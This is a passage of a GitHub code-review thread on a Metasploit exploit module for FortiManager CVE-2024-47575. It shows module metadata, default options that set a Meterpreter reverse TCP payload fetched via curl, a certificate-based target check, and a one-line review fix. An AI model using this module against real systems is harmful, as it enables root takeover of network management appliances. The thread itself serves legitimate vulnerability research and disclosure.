modules/exploits/linux/misc/fortimanager_rce_cve_2024_47575.rb

```diff
@@ -0,0 +1,321 @@
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # MSF Exploit & Rapid7 Analysis
+        ],
+        'References' => [
+          ['CVE', '2024-47575'],
+          # AttackerKB Rapid7 Analysis.
+          ['URL', 'https://attackerkb.com/topics/OFBGprmpIE/cve-2024-47575/rapid7-analysis'],
+          # Bishop Fox details certificate requirements for connecting to the FGFM service.
+          ['URL', 'https://bishopfox.com/blog/a-look-at-fortijump-cve-2024-47575'],
+          # Vendor Advisory.
+          ['URL', 'https://fortiguard.fortinet.com/psirt/FG-IR-24-423']
+        ],
+        'DisclosureDate' => '2024-10-23',
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true, # Code execution as 'root'
+        'DefaultOptions' => {
+          'RPORT' => 541,
+          'SSL' => true,
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+          'FETCH_WRITABLE_DIR' => '/tmp',
+          'FETCH_COMMAND' => 'CURL'
+        },
+        'Targets' => [ [ 'Default', {} ] ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        # The exploit provides a suitable client certificate/key pair by default, however we can let a user configure
+        # a different certificate/key pair to use if they want. The user can also override the serial number and
+        # platform if needed, but the exploit will try to detect the serial number and platform from the certificate
+        # by default.
+        OptString.new('ClientCert', [false, 'A file path to an x509 cert, signed by Fortinet, with a serial number in the CN', nil]),
+        OptString.new('ClientKey', [false, 'A file path to the corresponding private key for the ClientCert.', nil]),
+        OptString.new('ClientSerialNumber', [false, 'If set, use this serial number instead of extracting one from the ClientCert.', nil]),
+        OptString.new('ClientPlatform', [false, 'If set, use this platform instead of determining the platform at runtime.', nil])
+      ]
+    )
+  end
+
+  def check
+    s = make_socket
+
+    peer_cert = OpenSSL::X509::Certificate.new(s.peer_cert)
+
+    s.close
+
+    organization = get_cert_subject_item(peer_cert, 'O')
+
+    common_name = get_cert_subject_item(peer_cert, 'CN')
+
+    # Detect that the target is a Fortinet FortiManager, by inspecting the certificate the server is using.
+    # We look for an organization (O) of 'Fortinet', and a common name (CN) that starts with a FortiManager serial
+    # number identifier.
+    return CheckCode::Detected if organization == 'Fortinet' && common_name&.start_with?('FMG')
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    client_cert_raw = datastore['ClientCert'] ? File.read(datastore['ClientCert']) : get_client_cert
```

Comment:
```suggestion
    client_cert_raw = datastore['ClientCert'] ? File.binread(datastore['ClientCert']) : get_client_cert
```

Reply:
commit [e5cdf60](https://github.com/rapid7/metasploit-framework/pull/19648/commits/e5cdf6097da4ee538d52867b8a09ac8d7d6a019a) resolves this.